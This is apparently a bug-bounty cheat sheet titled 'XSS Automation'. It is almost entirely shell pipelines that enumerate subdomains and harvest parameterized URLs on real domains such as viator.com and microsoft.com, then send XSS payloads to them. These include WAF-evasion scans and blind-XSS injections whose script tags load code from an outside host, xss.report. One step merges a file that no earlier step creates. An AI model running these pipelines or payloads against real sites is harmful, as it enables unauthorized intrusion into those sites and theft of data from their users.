XSS Automation

The document outlines a comprehensive process for subdomain enumeration and URL discovery using tools such as httpx-toolkit, gau, waybackurls, and katana. It details steps for URL processing, including filtering for alive URLs, identifying potential XSS vulnerabilities, and executing payloads for testing. It also provides commands for blind XSS attacks and mentions the premium KNOXSS API (used via knoxnl) for enhanced capabilities.


First, do subdomain enumeration and save the results to subdomains.txt, e.g.: subfinder -d example.com -all -o subdomains.txt

Live Subdomain Detection:


cat subdomains.txt | httpx-toolkit -ports 80,443,8080,8000,8888 -threads 200 > subdomains_alive.txt

URL Discovery:
cat subdomains_alive.txt | gau > gau.txt
cat subdomains_alive.txt | waybackurls > way.txt
urlfinder -list subdomains_alive.txt -o urlfinder.txt
cat subdomains_alive.txt | hakrawler > hakrawler.txt
katana -u subdomains_alive.txt -d 5 | tee katana.txt
katana -u subdomains_alive.txt -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -kf -jc -fx -ef js,css,png,svg,jpg,woff2,jpeg,gif | tee ks.txt
paramspider -d nasa.com | tee paramspider.txt
waymore -i microsoft.com | tee waymore.txt

URL Processing:
1. cat allurls.txt gau.txt hakrawler.txt katana.txt urlfinder.txt way.txt paramspider.txt waymore.txt | tee urls.txt
2. cat urls.txt | uro | tee uro.txt
3. cat uro.txt | subprober -ra -das -to 3000 -nc -o alive-urls.txt -c 20
4. cat alive-urls.txt | grep = | tee aliveparam.txt
5. cat aliveparam.txt | gf xss | uro | Gxss | kxss | tee xss_output.txt
6. cat xss_output.txt | grep -oP 'URL: \K\S+' | sed 's/=.*/=/' | sort -u > final.txt
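The grep '=' filter and the value-stripping in the final step can be illustrated on sample data; this is a pure-shell sketch with made-up URLs, no external tools required:

```shell
# Keep only parameterized URLs, strip parameter values, deduplicate --
# the same normalization steps 4 and 6 above perform on real output.
printf '%s\n' \
  'https://a.com/page?id=1' \
  'https://a.com/page?id=2' \
  'https://a.com/static/app.js' \
  'https://b.com/search?q=test' |
grep '=' |         # keep URLs that carry query parameters
sed 's/=.*/=/' |   # strip values: ?id=1 -> ?id=
sort -u            # duplicates like ?id=1 / ?id=2 collapse to one entry
```

This is why the final list contains one candidate per unique parameter, not one per unique value.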
Optionally, use the loxs tool's XSS module on final.txt.
Use dalfox: cat final.txt | dalfox pipe
cat final.txt | dalfox pipe --waf-evasion --worker 10
For blind XSS: cat final.txt | dalfox pipe -b 'your-blind-xss-payload'
One-line blind XSS command: subfinder -d viator.com | httpx-toolkit -silent | katana -f qurl | gf xss | bxss -appendMode -payload '"><script src=https://xss.report/c/tanvir6197></script>' -parameters

subfinder -d example.com | gau | bxss -payload '"><script src=https://xss.report/c/coffinxp></script>' -header 'X-Forwarded-For'

One-line XSS command: echo 'example.com' | gau | qsreplace '<sCript>confirm(1)</sCript>' | xsschecker -match '<sCript>confirm(1)</sCript>' -vuln
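qsreplace substitutes every query-string value with the given payload. For a single-parameter URL the effect is roughly the sed one-liner below (a simplified sketch with a made-up URL; the real qsreplace handles multiple parameters per URL):

```shell
# Simplified stand-in for qsreplace on a single-parameter URL:
# replace everything after '=' with the payload.
payload='<sCript>confirm(1)</sCript>'
printf '%s\n' 'https://a.com/page?id=1' |
sed "s|=.*|=$payload|"
# -> https://a.com/page?id=<sCript>confirm(1)</sCript>
```

xsschecker then requests each such URL and reports ones whose response still contains the unmodified payload string.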

ffuf -request xss -request-proto https -w /root/wordlists/xss-payloads.txt -c -mr "<script>alert('XSS')</script>"

gau -t 50 example.com | grep '=' | qsreplace '"><img src=x onerror=alert(1)>' | while read url; do curl -s "$url" | grep -q '<img src=x onerror=alert(1)>' && echo "[+] XSS: $url"; done
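The while-read reflection check above can be exercised offline by stubbing curl with a hypothetical fetch() function; the URLs and responses below are invented purely for illustration:

```shell
# fetch() stands in for `curl -s`, returning canned responses:
# the /vuln URL reflects the payload raw, the /safe URL HTML-encodes it.
fetch() {
  case "$1" in
    *vuln*) printf '<html><img src=x onerror=alert(1)></html>\n' ;;
    *)      printf '<html>&lt;img src=x onerror=alert(1)&gt;</html>\n' ;;
  esac
}

printf '%s\n' 'https://a.com/safe?q=x' 'https://a.com/vuln?q=x' |
while read -r url; do
  fetch "$url" | grep -q '<img src=x onerror=alert(1)>' && echo "[+] XSS: $url"
done
# -> [+] XSS: https://a.com/vuln?q=x
```

Only the raw, unencoded reflection matches grep, which is exactly what separates a likely XSS from a properly escaped parameter.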

If you have access to the premium KNOXSS API (via knoxnl):

cat waymore.txt | gf xss | urless | anew xss
knoxnl -i xss -X BOTH
